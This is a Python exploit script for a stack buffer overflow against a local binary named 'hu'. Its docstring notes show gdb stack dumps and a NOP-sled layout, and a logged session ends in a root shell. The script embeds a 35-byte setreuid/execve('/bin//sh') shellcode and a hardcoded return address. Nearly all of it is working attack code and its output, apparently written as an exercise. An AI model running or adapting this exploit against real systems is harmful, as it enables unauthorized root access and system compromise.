#!/usr/bin/env python
"""
Ok so it seems i made a mistake in my original
notes. sorry ;>
tip) check the stack to make sure your shellcode
is not being corrupted.
ex:
(gdb) x/10x $esp - 47
0xbffff591: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff5a1: 0x90909090 0x90909090 0xdb31c031 0xd231c931
0xbffff5b1: 0x80cd46b0 0x2f2f6851
(gdb)
0xbffff5b9: 0x2f686873 0x006e6962 0x2f000000 0x2f6e6962
0xbffff5c9: 0x0068732f 0x00000000 0xf0bffff7 0x48bffff5
0xbffff5d9: 0x75bffff6 0x70b7e8a7
(gdb) quit
we see our shellcode starting at 0xbffff5a1 going through
the addresses we see it gets corrupted for some reason at 0xbffff5b9
null bytes -> fail.
Solution:
Eip resides at buffer = 1032 exactly so your buffer has to be 1028bytes
not 1032. since you use those extra 4 bytes as the eip address..
anyway for this bug i just split the buffer up like so
NOPS -> 428 bytes
SHELLCODE -> 35 bytes
NOPS -> 565 bytes
RET -> 4 bytes
>>> 428 + 35 + 565 +4
1032
(gdb) x/10x $esp -625
0xbffff35f: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff36f: 0x90909090 0x31c03190 0x31c931db 0xcd46b0d2
0xbffff37f: 0x2f685180 0x6868732f
(gdb) quit
as you can see our shellcode is not corrupted this time as it was last time :D
---
root@user-laptop:/home/user# nano bleh.py
root@user-laptop:/home/user# python bleh.py
# id
uid=0(root) gid=0(root) groups=0(root)
# exit
"""
import os
import struct
#shellcode len is 35
shellcode = (
"\x31\xc0\x31\xdb\x31\xc9"
"\x31\xd2\xb0\x46\xcd\x80"
"\x51\x68\x2f\x2f\x73\x68"
"\x68\x2f\x62\x69\x6e\x89"
"\xe3\x51\x53\x89\xe1\x31"
"\xc0\xb0\x0b\xcd\x80")
#EIP OVERWRITE IS AT 1032
lols = "\x90"*428
lols += shellcode
lols += "\x90"*565
lols += struct.pack('<L',0xbffff35f)
print os.system("./hu %s"%lols)